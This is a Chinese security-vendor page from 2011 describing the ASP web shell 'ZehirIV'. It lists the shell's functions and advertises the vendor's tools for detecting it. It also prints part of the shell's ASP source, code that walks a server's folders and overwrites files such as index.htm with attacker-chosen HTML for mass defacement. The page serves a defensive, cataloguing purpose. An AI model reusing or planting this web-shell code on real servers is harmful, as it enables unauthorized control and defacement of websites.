[AhmetDeniz.Org] ZehirIV

2011-12-16 17:17:57 来源:本站原创,请勿转载 浏览:212
[AhmetDeniz.Org] ZehirIV

木马名称:ZehirIV
木马格式:asp
默认密码:
木马作用:文件管理,系统信息查看,系统测试,站点测试,执行SQL语句……

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:外国人编写的木马,危险!
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 [AhmetDeniz.Org] ZehirIV 这个asp网页木马。

[AhmetDeniz.Org] ZehirIV部分代码
<%
mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\")
dosyaPath = mid(mpat,InStrRev(mpat,"\")+1)
on error resume next
Dim objFSO,popup
Set objFSO = CreateObject ("Scripting.FileSystemObject")
if Request("kuskapani")=1 then
 Response.End
end if
if Request("kuskapani")=2 then
 on error resume next
 path = Request("path")
 sFolder = Request("SubFolder")
 fName = Request("FileName")
 d1 = Request("dosya1")
 d2 = Request("dosya2")
 d3 = Request("dosya3")
 d4 = Request("dosya4")
 bg__ = Request.Form("selectColour")
 if bg__ = "0" then bg__ = "#ffffff"
 byMesaj = "<body bgColor='"&bg__&"'>" & Request("byMesaj") & "<br><br><center><font color=gray size=2>powered by Z" & Session("n2") & "3 ;)</font>"
 
 sFolder = Replace(sFolder,"/","\")

 if Right(sFolder,1)<>"\" then sFolder = sFolder & "\"
 Set f = objFSO.GetFolder(Path)
 Set fc = f.SubFolders
 h__ = 0
 f__ = 0
 ss__ = now
 For Each f1 In fc
  hedef_ = replace(f1.path,"/","\")
  if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\"
  hedef__ = left(hedef_,len(hedef_)-1)
  folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\"))
   if d1<>"" then d1 = true
   if d2<>"" then d2 = true
   if d3<>"" then d3 = true
   if d4<>"" then d4 = true
   on error goto 0:on error resume next
   if fName<>"" then
    Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True)
    MyFile.write byMesaj
   end if
   if d1 then
    Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True)
    MyFile.write byMesaj
   end if

(0)
(0)